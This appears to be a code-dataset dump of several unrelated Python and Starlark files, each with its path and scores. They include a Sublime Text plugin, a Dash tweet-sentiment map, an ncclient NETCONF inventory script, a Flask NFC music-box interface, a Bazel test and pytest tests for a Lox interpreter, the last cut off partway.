conf.set('urls', url_list)
sublime.save_settings(CONFIG_BASE_NAME)
def remove_from_list(self, index, conf):
url_list = conf.get('urls', [])
url_list.pop(index)
conf.set('urls', url_list)
sublime.save_settings(CONFIG_BASE_NAME)
def find_url(self, pt):
line = self.view.line(pt)
a, b = [max(line.a, pt - 1024), min(line.b, pt + 1024)]
line = sublime.Region(a, b)
text = self.view.substr(line)
it = REX_URL.finditer(text)
for match in it:
if match.start() <= (pt - line.a) and match.end() >= (pt - line.a):
url = text[match.start():match.end()]
return url
return None
if gte_st3:
class HiveAddContextUrlCommand(HiveAddContextUrlBaseCommand):
def find_url(self, event):
pt = self.view.window_to_text((event['x'], event['y']))
return super(HiveAddContextUrlCommand, self).find_url(pt)
def want_event(self):
return True
else:
class HiveAddContextUrlCommand(HiveAddContextUrlBaseCommand):
def find_url(self, event):
selection = self.view.sel()
if not len(selection): return None
pt = selection[-1].b
return super(HiveAddContextUrlCommand, self).find_url(pt) | add_context_url.py | import sublime, sublime_plugin
gte_st3 = int(sublime.version()) >= 3000
if gte_st3:
from .config import *
else:
from config import *
class HiveAddContextUrlBaseCommand(sublime_plugin.TextCommand):
def run(self, edit, event=None):
conf = sublime.load_settings(CONFIG_BASE_NAME)
url = self.find_url(event)
index = self.index_in_list(url, conf)
if index == -1:
self.add_to_list(url, conf)
sublime.status_message('URL `%s` has been added to open list.' % url)
else:
self.remove_from_list(index, conf)
sublime.status_message('URL `%s` has been removed from open list.' % url)
def is_visible(self, event=None):
return self.find_url(event) is not None
def description(self, event=None):
url = self.find_url(event)
if self.index_in_list(url) == -1:
return 'Add URL to Open List'
else:
return 'Remove URL from Open List'
def index_in_list(self, url, conf=None):
if conf == None:
conf = sublime.load_settings(CONFIG_BASE_NAME)
url_list = [item[0] for item in conf.get('urls', [])]
return url_list.index(url) if url in url_list else -1
def add_to_list(self, url, conf):
url_list = conf.get('urls', [])
url_list.append([url, ''])
conf.set('urls', url_list)
sublime.save_settings(CONFIG_BASE_NAME)
def remove_from_list(self, index, conf):
url_list = conf.get('urls', [])
url_list.pop(index)
conf.set('urls', url_list)
sublime.save_settings(CONFIG_BASE_NAME)
def find_url(self, pt):
line = self.view.line(pt)
a, b = [max(line.a, pt - 1024), min(line.b, pt + 1024)]
line = sublime.Region(a, b)
text = self.view.substr(line)
it = REX_URL.finditer(text)
for match in it:
if match.start() <= (pt - line.a) and match.end() >= (pt - line.a):
url = text[match.start():match.end()]
return url
return None
if gte_st3:
class HiveAddContextUrlCommand(HiveAddContextUrlBaseCommand):
def find_url(self, event):
pt = self.view.window_to_text((event['x'], event['y']))
return super(HiveAddContextUrlCommand, self).find_url(pt)
def want_event(self):
return True
else:
class HiveAddContextUrlCommand(HiveAddContextUrlBaseCommand):
def find_url(self, event):
selection = self.view.sel()
if not len(selection): return None
pt = selection[-1].b
return super(HiveAddContextUrlCommand, self).find_url(pt) | 0.361728 | 0.09709 |
import dash
import dash_html_components as html
import dash_core_components as dcc
import plotly
import plotly.graph_objs as go
from WatchDogs_MongoWrapper import MongoWrapper
from dash.dependencies import Input, Output
import pandas as pd
df = pd.read_csv('/Users/iankresyman/Desktop/2011_february_us_airport_traffic2.csv')
df.head()
df['text'] = df['airport'] + '' + df['city'] + ', ' + df['state'] + '' + 'Arrivals: ' + df['cnt'].astype(str)
scl = [ [0,"rgb(39,174,96)"],[0.35,"rgb(46,204,113)"],[0.5,"rgb(241,196,15)"],\
[0.6,"rgb(243,156,18)"],[0.7,"rgb(231,76,60)"],[1,"rgb(192,57,43)"] ]
mongo = MongoWrapper()
negCoord, neuCoord, posCoord = mongo.get_lat_long('Facebook')
getTweets = mongo.get_tweets_with_lat_long('Facebook')
allLatitude = getTweets['Latitude']
allLongitude = getTweets['Longitude']
allSentiment = getTweets['Sentiment_Value']
print('\n')
# print(negCoord[0])
# df1 = pd.DataFrame()
# df2 = pd.DataFrame()
# df3 = pd.DataFrame()
# df4 = pd.DataFrame()
# df5 = pd.DataFrame()
# df6 = pd.DataFrame()
# print(mongo.get_tweets_with_lat_long('Facebook'))
# df1['negLat'] = negCoord[0]
# df2['negLong'] = negCoord[1]
# df3['posLat'] = posCoord[0]
# df4['posLong'] = posCoord[1]
# df5['neuLat'] = neuCoord[0]
# df6['neuLong'] = neuCoord[1]
print('\n')
# merge = pd.merge(df1,df3,on='latty', how='inner')
# print(merge)
# print(df5['neuLat'])
# print(df6['neuLong'])
# print(df1['latty'])
print('\n')
# print(df[negCoord[0]])
# print('\n')
# print(df['long'])
print('\n')
app = dash.Dash()
app.layout = html.Div(children=[
dcc.Graph(
style={'height': '800px'},
figure={
'data' :[{
'type':'scattergeo',
'locationmode':'USA-states',
'lon' : allLongitude,
'lat' : allLatitude,
'text' : allSentiment,
'mode':'markers',
'marker':{
'size':8,
'opacity':0.8,
'reversescale':True,
'autocolorscale':False,
'symbol':'circle',
'line':{
'width':1,
'color':'rgba(102, 102, 102)'
},
'colorscale' : scl,
'cmin' : -1,
'color' : allSentiment,
'cmax' : 1,
'colorbar':{
'title':"Polarity Scale"
}
}
}],
'layout' :{
'title':{
'text': 'Tweet locations with sentiment ratings',
},
'font':{
'size':15,
},
'geo' :{
# 'scope':'usa',
# 'projection':dict( 'type'='albers usa' ),
'showland' : True,
'landcolor' : "rgb(250, 250, 250)",
'subunitcolor' : "rgb(217, 217, 217)",
'countrycolor' : "rgb(217, 217, 217)",
'countrywidth' : 0.5,
'subunitwidth' : 0.5
},
}
}
)
])
if __name__ == '__main__':
app.run_server(debug=True) | WatchDogs_Visualisation/oldApps/tweet-map/testmap.py | import dash
import dash_html_components as html
import dash_core_components as dcc
import plotly
import plotly.graph_objs as go
from WatchDogs_MongoWrapper import MongoWrapper
from dash.dependencies import Input, Output
import pandas as pd
df = pd.read_csv('/Users/iankresyman/Desktop/2011_february_us_airport_traffic2.csv')
df.head()
df['text'] = df['airport'] + '' + df['city'] + ', ' + df['state'] + '' + 'Arrivals: ' + df['cnt'].astype(str)
scl = [ [0,"rgb(39,174,96)"],[0.35,"rgb(46,204,113)"],[0.5,"rgb(241,196,15)"],\
[0.6,"rgb(243,156,18)"],[0.7,"rgb(231,76,60)"],[1,"rgb(192,57,43)"] ]
mongo = MongoWrapper()
negCoord, neuCoord, posCoord = mongo.get_lat_long('Facebook')
getTweets = mongo.get_tweets_with_lat_long('Facebook')
allLatitude = getTweets['Latitude']
allLongitude = getTweets['Longitude']
allSentiment = getTweets['Sentiment_Value']
print('\n')
# print(negCoord[0])
# df1 = pd.DataFrame()
# df2 = pd.DataFrame()
# df3 = pd.DataFrame()
# df4 = pd.DataFrame()
# df5 = pd.DataFrame()
# df6 = pd.DataFrame()
# print(mongo.get_tweets_with_lat_long('Facebook'))
# df1['negLat'] = negCoord[0]
# df2['negLong'] = negCoord[1]
# df3['posLat'] = posCoord[0]
# df4['posLong'] = posCoord[1]
# df5['neuLat'] = neuCoord[0]
# df6['neuLong'] = neuCoord[1]
print('\n')
# merge = pd.merge(df1,df3,on='latty', how='inner')
# print(merge)
# print(df5['neuLat'])
# print(df6['neuLong'])
# print(df1['latty'])
print('\n')
# print(df[negCoord[0]])
# print('\n')
# print(df['long'])
print('\n')
app = dash.Dash()
app.layout = html.Div(children=[
dcc.Graph(
style={'height': '800px'},
figure={
'data' :[{
'type':'scattergeo',
'locationmode':'USA-states',
'lon' : allLongitude,
'lat' : allLatitude,
'text' : allSentiment,
'mode':'markers',
'marker':{
'size':8,
'opacity':0.8,
'reversescale':True,
'autocolorscale':False,
'symbol':'circle',
'line':{
'width':1,
'color':'rgba(102, 102, 102)'
},
'colorscale' : scl,
'cmin' : -1,
'color' : allSentiment,
'cmax' : 1,
'colorbar':{
'title':"Polarity Scale"
}
}
}],
'layout' :{
'title':{
'text': 'Tweet locations with sentiment ratings',
},
'font':{
'size':15,
},
'geo' :{
# 'scope':'usa',
# 'projection':dict( 'type'='albers usa' ),
'showland' : True,
'landcolor' : "rgb(250, 250, 250)",
'subunitcolor' : "rgb(217, 217, 217)",
'countrycolor' : "rgb(217, 217, 217)",
'countrywidth' : 0.5,
'subunitwidth' : 0.5
},
}
}
)
])
if __name__ == '__main__':
app.run_server(debug=True) | 0.114963 | 0.118487 |
from ncclient import manager
import yaml
import xml.dom.minidom
import lxml.etree as et
import xmltodict
payload = """
<filter>
<device-hardware-data xmlns="http://cisco.com/ns/yang/Cisco-IOS-XE-device-hardware-oper">
<device-hardware>
<device-inventory>
<serial-number/>
<hw-type/>
<hw-dev-index/>
</device-inventory>
</device-hardware>
</device-hardware-data>
</filter>
"""
# Getting the device information from the .yaml file
with open("devices.yaml", 'r') as devices:
xe_sandbox = yaml.safe_load(devices)["xe_sandbox"]
# Using ncclient to get the running-config of the device, as xml
with manager.connect(host=xe_sandbox["host"], port=xe_sandbox["port"],
username=xe_sandbox["username"], password=<PASSWORD>["password"], hostkey_verify=False) as m:
# getting the response. Converting to xml using the .data_xml attribute.
# Using the xml.dom.minidom library to pretty print the configuration
response_xml = xml.dom.minidom.parseString(m.get(payload).data_xml)
# Showing the full xml output
print("Response =\n{response}".format(response=response_xml.toprettyxml()))
# print(type(m.get(payload))) => returns a <class 'ncclient.operations.retrieve.GetReply'>
# print(type(m.get(payload).data_xml)) => returns a <class 'str'>
# print(type(response_xml)) => returns <class 'xml.dom.minidom.Document'>
# Just getting what we need
# First, converting the xml as a dict
response_dict = xmltodict.parse(response_xml.toxml())["data"]["device-hardware-data"]["device-hardware"]["device-inventory"]
print(dir(m))
# Printing each hw_type with its serial_number
for element in range(response_dict.__len__()):
for key, value in response_dict[element].items():
if key == "hw-type":
hw_type = value
if key == "serial-number":
serial_number = value
print("{hw} has SN : {sn}".format(hw=hw_type, sn=serial_number)) | advanced-netconf-explorer/solutions/1_ncclient_mission_serial_number/run.py | from ncclient import manager
import yaml
import xml.dom.minidom
import lxml.etree as et
import xmltodict
payload = """
<filter>
<device-hardware-data xmlns="http://cisco.com/ns/yang/Cisco-IOS-XE-device-hardware-oper">
<device-hardware>
<device-inventory>
<serial-number/>
<hw-type/>
<hw-dev-index/>
</device-inventory>
</device-hardware>
</device-hardware-data>
</filter>
"""
# Getting the device information from the .yaml file
with open("devices.yaml", 'r') as devices:
xe_sandbox = yaml.safe_load(devices)["xe_sandbox"]
# Using ncclient to get the running-config of the device, as xml
with manager.connect(host=xe_sandbox["host"], port=xe_sandbox["port"],
username=xe_sandbox["username"], password=<PASSWORD>["password"], hostkey_verify=False) as m:
# getting the response. Converting to xml using the .data_xml attribute.
# Using the xml.dom.minidom library to pretty print the configuration
response_xml = xml.dom.minidom.parseString(m.get(payload).data_xml)
# Showing the full xml output
print("Response =\n{response}".format(response=response_xml.toprettyxml()))
# print(type(m.get(payload))) => returns a <class 'ncclient.operations.retrieve.GetReply'>
# print(type(m.get(payload).data_xml)) => returns a <class 'str'>
# print(type(response_xml)) => returns <class 'xml.dom.minidom.Document'>
# Just getting what we need
# First, converting the xml as a dict
response_dict = xmltodict.parse(response_xml.toxml())["data"]["device-hardware-data"]["device-hardware"]["device-inventory"]
print(dir(m))
# Printing each hw_type with its serial_number
for element in range(response_dict.__len__()):
for key, value in response_dict[element].items():
if key == "hw-type":
hw_type = value
if key == "serial-number":
serial_number = value
print("{hw} has SN : {sn}".format(hw=hw_type, sn=serial_number)) | 0.28877 | 0.088583 |
from mongoengine import *
import json
class UserAgent(EmbeddedDocument):
browser = StringField()
language = StringField()
platform = StringField()
string = StringField()
version = StringField()
class Tracking(Document):
#session_key = models.CharField(max_length=40, null=True, blank=True, db_index=True)
date_created = DateTimeField()
host = StringField()
path = StringField()
query_params = StringField()
ip = StringField()
user = GenericReferenceField()
user_agent = EmbeddedDocumentField(UserAgent)
method = StringField()
request_headers = ListField()
request_body = BinaryField()
status_code = IntField()
response_headers = ListField()
# Execution time in ms
execution_time = IntField()
# System hostname
hostname = StringField()
custom_data = DynamicField()
meta = {
'max_documents': 10**6, # 1 million
}
def user_repr(self):
if self._data['user']:
if isinstance(self._data['user'], dict):
return self._data['user']['_ref'].id
else:
return self.user.id
else:
return '-'
def __unicode__(self):
return '{id} {date} {method} {user} {path}{query} {status} ({time} ms)'.format(
id=self.id,
date=self.date_created.strftime('%Y-%m-%d %H:%M:%S.%f'),
method=self.method,
user=self.user_repr(),
path=self.path,
query=self.query_params and '?%s' % self.query_params or '',
status=self.status_code,
time=self.execution_time)
def debug(self):
ret = '%s %s%s%s\n' % (self.method, self.host, self.path, self.query_params and '?%s' % self.query_params or '')
ret += 'REQUEST:\n'
ret += self.format_headers(self.request_headers) + '\n'
ret += '%s RESPONSE:\n' % self.status_code
ret += self.format_headers(self.response_headers) + '\n'
ret += self.format_body(self.response_body)
return ret
def get_header(self, name, default=''):
return { h[0]: h[1] for h in self.request_headers }.get(name, default)
def replay(self):
from flask import current_app
client = current_app.test_client()
# Make sure we don't send invalid cookies.
client.cookie_jar.clear()
full_path = self.path + ('?'+self.query_params if self.query_params else '')
method_func = getattr(client, self.method.lower())
return method_func(
full_path,
headers=self.request_headers,
data=self.request_body,
content_type=dict(self.request_headers)['Content-Type']
)
@staticmethod
def format_body(inpt):
"""Format an HTTP body as JSON if possible, otherwise return string"""
try:
return json.dumps(json.loads(inpt.decode('utf8')), indent=4)
except ValueError:
return repr(inpt)
@staticmethod
def format_headers(headers):
return '\n'.join([' %s: %s' % (h[0], h[1] if len(h[1]) < 100 else '%s...' % h[1][:100]) for h in headers]) | wicarproject/utilities/flask_tracking/documents.py | from mongoengine import *
import json
class UserAgent(EmbeddedDocument):
browser = StringField()
language = StringField()
platform = StringField()
string = StringField()
version = StringField()
class Tracking(Document):
#session_key = models.CharField(max_length=40, null=True, blank=True, db_index=True)
date_created = DateTimeField()
host = StringField()
path = StringField()
query_params = StringField()
ip = StringField()
user = GenericReferenceField()
user_agent = EmbeddedDocumentField(UserAgent)
method = StringField()
request_headers = ListField()
request_body = BinaryField()
status_code = IntField()
response_headers = ListField()
# Execution time in ms
execution_time = IntField()
# System hostname
hostname = StringField()
custom_data = DynamicField()
meta = {
'max_documents': 10**6, # 1 million
}
def user_repr(self):
if self._data['user']:
if isinstance(self._data['user'], dict):
return self._data['user']['_ref'].id
else:
return self.user.id
else:
return '-'
def __unicode__(self):
return '{id} {date} {method} {user} {path}{query} {status} ({time} ms)'.format(
id=self.id,
date=self.date_created.strftime('%Y-%m-%d %H:%M:%S.%f'),
method=self.method,
user=self.user_repr(),
path=self.path,
query=self.query_params and '?%s' % self.query_params or '',
status=self.status_code,
time=self.execution_time)
def debug(self):
ret = '%s %s%s%s\n' % (self.method, self.host, self.path, self.query_params and '?%s' % self.query_params or '')
ret += 'REQUEST:\n'
ret += self.format_headers(self.request_headers) + '\n'
ret += '%s RESPONSE:\n' % self.status_code
ret += self.format_headers(self.response_headers) + '\n'
ret += self.format_body(self.response_body)
return ret
def get_header(self, name, default=''):
return { h[0]: h[1] for h in self.request_headers }.get(name, default)
def replay(self):
from flask import current_app
client = current_app.test_client()
# Make sure we don't send invalid cookies.
client.cookie_jar.clear()
full_path = self.path + ('?'+self.query_params if self.query_params else '')
method_func = getattr(client, self.method.lower())
return method_func(
full_path,
headers=self.request_headers,
data=self.request_body,
content_type=dict(self.request_headers)['Content-Type']
)
@staticmethod
def format_body(inpt):
"""Format an HTTP body as JSON if possible, otherwise return string"""
try:
return json.dumps(json.loads(inpt.decode('utf8')), indent=4)
except ValueError:
return repr(inpt)
@staticmethod
def format_headers(headers):
return '\n'.join([' %s: %s' % (h[0], h[1] if len(h[1]) < 100 else '%s...' % h[1][:100]) for h in headers]) | 0.5144 | 0.090574 |
import main
import state
import utils
import os
from flask import Flask, render_template, request, redirect, cli
from werkzeug.utils import secure_filename
from nfc_reader import start_nfc_thread
from utils import printt
DEVENV = False
try:
# pylint: disable=import-error
import RPi.GPIO as GPIO
except:
DEVENV = True
app = Flask(__name__)
cli.show_server_banner = lambda *_: None
def init():
printt('Initializing web interface...')
app.config['TEMPLATES_AUTO_RELOAD'] = True
printt('Ready!')
def run_wait():
    """Run the Flask server: port 5000 on a dev machine, port 80 on the Pi."""
    port = 5000 if DEVENV else 80
    app.run(host='0.0.0.0', port=port)
@app.route('/')
def index():
player = state.get_player()
vm = {
'nfc_status': state.get_nfc_status(),
'song_name': state.get_song_name(),
'is_playing': player.is_state(player.STATE_PLAYING),
'is_paused': player.is_state(player.STATE_PAUSED),
'is_stopped': player.is_state(player.STATE_STOPPED),
'version': main.VERSION
}
return render_template('index.html', vm=vm)
# ACTIONS
@app.route('/actions/initnfc')
def action_initnfc():
if not state.get_nfc_status():
start_nfc_thread()
return redirect('/')
@app.route('/actions/reloadsongs')
def action_reloadsongs():
player = state.get_player()
player.reload_songs()
return redirect('/tags')
@app.route('/actions/stop')
def action_stop():
player = state.get_player()
player.stop()
return redirect('/')
@app.route('/actions/play')
def action_play():
player = state.get_player()
player.play()
return redirect('/')
@app.route('/actions/pause')
def action_pause():
player = state.get_player()
player.pause()
return redirect('/')
@app.route('/actions/vol')
def action_vol():
    """Set playback volume from the 'vol' query parameter, ignoring bad input."""
    try:
        volume = float(request.args.get('vol'))
        state.get_player().set_vol(volume)
    except:
        # Deliberately best-effort: a missing or garbled value leaves the
        # volume unchanged.
        pass
    return redirect('/')
# LOGS
@app.route('/logs')
def logs():
    """Render the application and error logs (empty string when absent)."""
    def read_or_empty(path):
        # File contents, or '' when the log file does not exist.
        if os.path.exists(path):
            with open(path) as handle:
                return handle.read()
        return ''
    vm = {
        'log': read_or_empty('/var/log/nfcmb.log'),
        'err': read_or_empty('/var/log/nfcmb_err.log'),
    }
    return render_template('logs.html', vm=vm)
# SETTINGS
@app.route('/settings')
def settings():
return render_template('settings.html')
@app.route('/actions/settings/update')
def settings_update():
main.update()
return redirect('/settings')
@app.route('/actions/settings/reboot')
def settings_reboot():
main.reboot()
return redirect('/settings')
# TAGS
@app.route('/tags')
def tags():
storage = state.get_storage()
tags = storage.get_tags()
vm = {
'tags': tags
}
return render_template('tags.html', vm=vm)
@app.route('/tags/add', methods=['GET'])
def tags_add():
return render_template('tags_add.html', vm={
'error': request.args.get('error'),
'last_tag': state.get_last_tag()
})
@app.route('/tags/add', methods=['POST'])
def tags_add_post():
    """Handle the add-tag form: store the uploaded MP3 and register the tag.

    Redirects back to the form with ?error=1 when the upload or the UID is
    missing or invalid; otherwise redirects to the tag list.
    """
    storage = state.get_storage()
    # .get() instead of [] so a missing form field redirects with an error
    # instead of letting Flask abort with a 400 BadRequestKeyError; also
    # check for None *before* touching songfile.filename (the original
    # accessed .filename first, defeating its own None check).
    songfile = request.files.get('song')
    uid = request.form.get('uid')
    if songfile is None or not uid:
        return redirect('/tags/add?error=1')
    songname = songfile.filename.replace(' ', '_')
    if not songname.lower().endswith('.mp3'):
        return redirect('/tags/add?error=1')
    storage.add_song(songfile, secure_filename(songname))
    newtag = {
        'uid': uid,
        'name': songname
    }
    try:
        storage.add_tag(newtag)
    except:
        # Best-effort as before: duplicate/invalid tags are silently ignored.
        pass
    return redirect('/tags')
@app.route('/actions/tags/play')
def tags_play():
storage = state.get_storage()
tags = storage.get_tags()
uid = request.args.get('uid')
tag = utils.select_tag(tags, uid)
if tag is not None:
player = state.get_player()
player.load(name=storage.to_full_path(tag['name']))
player.play()
return redirect('/tags')
@app.route('/actions/tags/delete')
def tag_delete():
    """Delete the tag identified by the 'uid' query parameter."""
    uid = request.args.get('uid')
    try:
        storage = state.get_storage()
        storage.remove_tag(uid)
    except Exception as e:
        # Log the failure but fall through so the user is still redirected.
        printt(e)
return redirect('/tags') | web_interface.py | import main
import state
import utils
import os
from flask import Flask, render_template, request, redirect, cli
from werkzeug.utils import secure_filename
from nfc_reader import start_nfc_thread
from utils import printt
DEVENV = False
try:
# pylint: disable=import-error
import RPi.GPIO as GPIO
except:
DEVENV = True
app = Flask(__name__)
cli.show_server_banner = lambda *_: None
def init():
printt('Initializing web interface...')
app.config['TEMPLATES_AUTO_RELOAD'] = True
printt('Ready!')
def run_wait():
if DEVENV:
app.run(host='0.0.0.0', port=5000)
else:
app.run(host='0.0.0.0', port=80)
@app.route('/')
def index():
player = state.get_player()
vm = {
'nfc_status': state.get_nfc_status(),
'song_name': state.get_song_name(),
'is_playing': player.is_state(player.STATE_PLAYING),
'is_paused': player.is_state(player.STATE_PAUSED),
'is_stopped': player.is_state(player.STATE_STOPPED),
'version': main.VERSION
}
return render_template('index.html', vm=vm)
# ACTIONS
@app.route('/actions/initnfc')
def action_initnfc():
if not state.get_nfc_status():
start_nfc_thread()
return redirect('/')
@app.route('/actions/reloadsongs')
def action_reloadsongs():
player = state.get_player()
player.reload_songs()
return redirect('/tags')
@app.route('/actions/stop')
def action_stop():
player = state.get_player()
player.stop()
return redirect('/')
@app.route('/actions/play')
def action_play():
player = state.get_player()
player.play()
return redirect('/')
@app.route('/actions/pause')
def action_pause():
player = state.get_player()
player.pause()
return redirect('/')
@app.route('/actions/vol')
def action_vol():
try:
vol = float(request.args.get('vol'))
player = state.get_player()
player.set_vol(vol)
except:
pass
return redirect('/')
# LOGS
@app.route('/logs')
def logs():
log_path = '/var/log/nfcmb.log'
err_path = '/var/log/nfcmb_err.log'
log = ''
err = ''
if os.path.exists(log_path):
with open(log_path) as f:
log = f.read()
if os.path.exists(err_path):
with open(err_path) as f2:
err = f2.read()
return render_template('logs.html', vm={
'log': log,
'err': err
})
# SETTINGS
@app.route('/settings')
def settings():
return render_template('settings.html')
@app.route('/actions/settings/update')
def settings_update():
main.update()
return redirect('/settings')
@app.route('/actions/settings/reboot')
def settings_reboot():
main.reboot()
return redirect('/settings')
# TAGS
@app.route('/tags')
def tags():
storage = state.get_storage()
tags = storage.get_tags()
vm = {
'tags': tags
}
return render_template('tags.html', vm=vm)
@app.route('/tags/add', methods=['GET'])
def tags_add():
return render_template('tags_add.html', vm={
'error': request.args.get('error'),
'last_tag': state.get_last_tag()
})
@app.route('/tags/add', methods=['POST'])
def tags_add_post():
storage = state.get_storage()
songfile = request.files['song']
songname = songfile.filename.replace(' ', '_')
if songfile is not None \
and request.form['uid'] is not None \
and len(request.form['uid']) > 0 \
and songname.lower().endswith('.mp3'):
storage.add_song(songfile, secure_filename(songname))
else:
return redirect('/tags/add?error=1')
newtag = {
'uid': request.form['uid'],
'name': songname
}
try:
storage.add_tag(newtag)
except:
pass
return redirect('/tags')
@app.route('/actions/tags/play')
def tags_play():
storage = state.get_storage()
tags = storage.get_tags()
uid = request.args.get('uid')
tag = utils.select_tag(tags, uid)
if tag is not None:
player = state.get_player()
player.load(name=storage.to_full_path(tag['name']))
player.play()
return redirect('/tags')
@app.route('/actions/tags/delete')
def tag_delete():
uid = request.args.get('uid')
try:
storage = state.get_storage()
storage.remove_tag(uid)
except Exception as e:
printt(e)
return redirect('/tags') | 0.215268 | 0.049291 |
"Unit tests for //internal/common:expand_into_runfiles.bzl"
load("@bazel_skylib//lib:unittest.bzl", "asserts", "unittest")
load("//internal/common:expand_into_runfiles.bzl", "expand_location_into_runfiles")
def _impl(ctx):
    """Assert expand_location_into_runfiles expands $(location), $(locations),
    $(rootpath) and $(rootpaths) templates to the expected runfiles-relative
    (resp. root-relative) paths, including when the template is surrounded by
    whitespace, repeated, or embedded in other text."""
    env = unittest.begin(ctx)
    conversions = {
        "$(location //:package.json)": "build_bazel_rules_nodejs/package.json",
        "$(location :a)": "build_bazel_rules_nodejs/internal/common/test/foo/bar/a.txt",
        "$(location params_file.spec.js)": "build_bazel_rules_nodejs/internal/common/test/params_file.spec.js",
        "$(locations :locations_in)": "build_bazel_rules_nodejs/package.json build_bazel_rules_nodejs/internal/common/test/foo/bar/a.txt build_bazel_rules_nodejs/internal/common/test/params_file.spec.js",
        "$(rootpath //:package.json)": "./package.json",
        "$(rootpath :a)": "internal/common/test/foo/bar/a.txt",
        "$(rootpath params_file.spec.js)": "internal/common/test/params_file.spec.js",
        "$(rootpaths :locations_in)": "./package.json internal/common/test/foo/bar/a.txt internal/common/test/params_file.spec.js",
    }
    for key in conversions:
        # Bare template; with surrounding spaces; repeated back-to-back,
        # space-separated, padded, and embedded between other characters.
        asserts.equals(env, "%s" % conversions[key], expand_location_into_runfiles(ctx, "%s" % key))
        asserts.equals(env, " %s " % conversions[key], expand_location_into_runfiles(ctx, " %s " % key))
        asserts.equals(env, "%s%s" % (conversions[key], conversions[key]), expand_location_into_runfiles(ctx, "%s%s" % (key, key)))
        asserts.equals(env, "%s %s" % (conversions[key], conversions[key]), expand_location_into_runfiles(ctx, "%s %s" % (key, key)))
        asserts.equals(env, " %s %s " % (conversions[key], conversions[key]), expand_location_into_runfiles(ctx, " %s %s " % (key, key)))
        asserts.equals(env, "a%sb%sc" % (conversions[key], conversions[key]), expand_location_into_runfiles(ctx, "a%sb%sc" % (key, key)))
    return unittest.end(env)
# Test rule wiring: the labels in `deps` make the targets referenced by the
# $(location ...) templates in _impl resolvable during analysis.
expand_into_runfiles_test = unittest.make(
    impl = _impl,
    attrs = {
        "deps": attr.label_list(default = [
            "//:package.json",
            "params_file.spec.js",
            ":a",
            ":locations_in",
        ], allow_files = True),
    },
)
def expand_into_runfiles_test_suite():
unittest.suite("expand_into_runfiles_tests", expand_into_runfiles_test) | internal/common/test/expand_into_runfiles_test.bzl | "Unit tests for //internal/common:expand_into_runfiles.bzl"
load("@bazel_skylib//lib:unittest.bzl", "asserts", "unittest")
load("//internal/common:expand_into_runfiles.bzl", "expand_location_into_runfiles")
def _impl(ctx):
env = unittest.begin(ctx)
conversions = {
"$(location //:package.json)": "build_bazel_rules_nodejs/package.json",
"$(location :a)": "build_bazel_rules_nodejs/internal/common/test/foo/bar/a.txt",
"$(location params_file.spec.js)": "build_bazel_rules_nodejs/internal/common/test/params_file.spec.js",
"$(locations :locations_in)": "build_bazel_rules_nodejs/package.json build_bazel_rules_nodejs/internal/common/test/foo/bar/a.txt build_bazel_rules_nodejs/internal/common/test/params_file.spec.js",
"$(rootpath //:package.json)": "./package.json",
"$(rootpath :a)": "internal/common/test/foo/bar/a.txt",
"$(rootpath params_file.spec.js)": "internal/common/test/params_file.spec.js",
"$(rootpaths :locations_in)": "./package.json internal/common/test/foo/bar/a.txt internal/common/test/params_file.spec.js",
}
for key in conversions:
asserts.equals(env, "%s" % conversions[key], expand_location_into_runfiles(ctx, "%s" % key))
asserts.equals(env, " %s " % conversions[key], expand_location_into_runfiles(ctx, " %s " % key))
asserts.equals(env, "%s%s" % (conversions[key], conversions[key]), expand_location_into_runfiles(ctx, "%s%s" % (key, key)))
asserts.equals(env, "%s %s" % (conversions[key], conversions[key]), expand_location_into_runfiles(ctx, "%s %s" % (key, key)))
asserts.equals(env, " %s %s " % (conversions[key], conversions[key]), expand_location_into_runfiles(ctx, " %s %s " % (key, key)))
asserts.equals(env, "a%sb%sc" % (conversions[key], conversions[key]), expand_location_into_runfiles(ctx, "a%sb%sc" % (key, key)))
return unittest.end(env)
expand_into_runfiles_test = unittest.make(
impl = _impl,
attrs = {
"deps": attr.label_list(default = [
"//:package.json",
"params_file.spec.js",
":a",
":locations_in",
], allow_files = True),
},
)
def expand_into_runfiles_test_suite():
unittest.suite("expand_into_runfiles_tests", expand_into_runfiles_test) | 0.58166 | 0.314524 |
import pytest
from yaplox.expr import Binary, Grouping, Literal, Unary
from yaplox.interpreter import Interpreter
from yaplox.parser import Parser
from yaplox.scanner import Scanner
from yaplox.stmt import Expression
from yaplox.token_type import TokenType
from yaplox.yaplox_runtime_error import YaploxRuntimeError
class TestInterpreter:
def test_visit_grouping_expr(self):
nested = Literal("18")
expr = Grouping(nested)
result = Interpreter().visit_grouping_expr(expr)
assert result == nested.value
def test_visit_literal_expr(self):
expr = Literal("42")
result = Interpreter().visit_literal_expr(expr)
assert result == "42"
@pytest.mark.parametrize(
("token_type", "literal", "expected"),
[
(TokenType.MINUS, 34, -34.0),
(TokenType.MINUS, -42, 42.0),
(TokenType.MINUS, -0, 0.0),
(TokenType.MINUS, 0, -0.0),
(TokenType.BANG, False, True),
(TokenType.BANG, True, False),
(TokenType.BANG, None, True), # !None == True
(TokenType.BANG, "Stringy", False),
(TokenType.BANG, "", False),
(TokenType.BANG, 0, False),
(TokenType.BANG, "0", False),
],
)
def test_visit_unary_expr(
self, create_token_factory, token_type, literal, expected
):
token = create_token_factory(token_type=token_type)
expr = Unary(token, right=Literal(literal))
result = Interpreter().visit_unary_expr(expr)
if isinstance(expected, bool):
assert result is expected
else:
assert result == expected
def test_visit_unary_sad_flow(self, create_token_factory):
# -"Foo" Should result in an error
token = create_token_factory(token_type=TokenType.MINUS)
expr = Unary(token, right=Literal("Foo"))
with pytest.raises(YaploxRuntimeError) as excinfo:
Interpreter().visit_unary_expr(expr)
assert "Foo must be a number" in str(excinfo.value)
@pytest.mark.parametrize(
("left", "token_type", "right", "expected"),
[
(10, TokenType.GREATER, 7, True),
(10, TokenType.GREATER_EQUAL, 10, True),
(7, TokenType.LESS, 10, True),
(7, TokenType.LESS_EQUAL, 7, True),
(7, TokenType.BANG_EQUAL, 7, False),
(7, TokenType.BANG_EQUAL, 10, True),
(None, TokenType.BANG_EQUAL, None, False), # None !=None
(None, TokenType.EQUAL_EQUAL, None, True), # None ==None
(None, TokenType.BANG_EQUAL, 5, True), # None != 5
(None, TokenType.EQUAL_EQUAL, 5, False), # None == 5
(5, TokenType.EQUAL_EQUAL, None, False), # 5 == None
("FooBar", TokenType.BANG_EQUAL, "BarFoo", True),
("FooBar", TokenType.EQUAL_EQUAL, "BarFoo", False),
("FooBar", TokenType.BANG_EQUAL, "FooBar", False),
("FooBar", TokenType.EQUAL_EQUAL, "FooBar", True),
(10, TokenType.MINUS, 7, 3),
(10, TokenType.MINUS, 20, -10),
(10, TokenType.MINUS, 20, -10),
